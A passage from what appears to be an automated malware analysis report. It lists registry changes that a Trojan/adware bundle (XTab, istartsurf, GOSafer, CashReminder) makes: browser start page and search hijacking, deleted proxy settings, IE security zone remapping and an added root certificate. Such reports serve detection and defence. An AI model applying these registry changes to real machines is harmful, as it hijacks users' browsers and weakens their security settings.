[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\IHProtect]
"ptid" = "pcm"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process XTab_Setup2121.exe:3372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files%\XTab\SupTab.dll"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files%\XTab"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files%\XTab\SupTab.dll"

[HKLM\SOFTWARE\SupDp]
"dir" = "%Program Files%\XTab"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 FA 39 C5 07 09 48 4F 9E 13 1F 12 D5 EF AA 55"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"

[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"

[HKLM\SOFTWARE\supTab]
"ptid" = "pcm"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wpm_v20.0.0.1953_0302.exe:3104 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 8F 9B 36 34 E9 3F 9C 4D 42 38 F8 54 74 2E 1A"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 71 D9 11 3C CF 3D D2 F0 3B 77 4F 30 26 04 05"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayVersion" = "1.0"
"Publisher" = "GO SAFER LLC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"UninstallString" = "%Program Files%\GOSafer\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayName" = "GOSafer"
"QuietUninstallString" = "%Program Files%\GOSafer\uninst.exe"
"Comments" = "Your custom offers and deals!(qR8OYLNuOiibJ6QjgTQRjI)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\GOSafer]
"Version" = "1.0.0"

The process net.exe:2552 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 35 59 43 40 22 67 9C 33 E6 7A 8E 17 B6 E8 49"

The process net.exe:1808 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 95 F0 C0 7F B2 9F E0 F1 B5 66 C1 6B E0 42 DF"

The process net.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF B4 4B F8 EC 5B C0 B2 3A A9 78 81 39 25 28 3D"

The process net.exe:400 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 40 79 76 4E 28 06 AD 7C 18 D5 D8 09 BF C5 41"

The process QQBrowser.exe:2908 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B E8 C2 8B 50 D8 4A DC FE 9E 2D 1B 9D 6E 3C 05"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp]
"RegWrite.exe" = "RegWrite"
"wpm_v20.0.0.1953_0302.exe" = "Windows SysTool Service"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp]
"XTab_Setup2121.exe" = "XTab"

The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security zone settings to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process QQBrowser.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe -ptid=pcm"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.istartsurf.com/?type=sc&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\istartsurfSoftware\istartsurfhp]
"Time" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe"
"DisplayName" = "istartsurf uninstall"
"Publisher" = "istartsurf"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"

[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\istartsurfSoftware\istartsurfhp]
"oem" = "pcm"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 1D 52 46 A8 6D 26 87 85 1B 7A 08 0C 12 09 A6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
"SearchAssistant" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 99 B5 77 EB AC 96 F0 AA 66 D1 DE 39 8C 6E 8C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\CashReminder]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"Publisher" = "Related Deals LLC"

[HKLM\SOFTWARE\CashReminder]
"affid" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"UninstallString" = "%Program Files%\CashReminder\uninstall.exe /S"

[HKLM\System\CurrentControlSet\Services\CashReminder]
"Description" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices!"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayName" = "CashReminder"
"Comments" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices! (Build: Vi8QYQCatMvm1PLT8H1tqpJtGKSso)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayVersion" = "1.0.0"
"QuietUninstallString" = "%Program Files%\CashReminder\uninstall.exe /S"

The process HPNotify.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 91 A0 A2 E4 C7 AD 39 4F 9C E0 63 ED 5E CA 69"

The process ActSys.exe:2648 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "10 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\asfilterdrv]
"Tag" = "17"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA 40 06 25 78 53 38 7D 1F 3C 1E B9 70 4A 64 EF"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E9C15E05782C5BADC4287A994D1DDEDB171B8B2A]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 E9 C1 5E 05"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
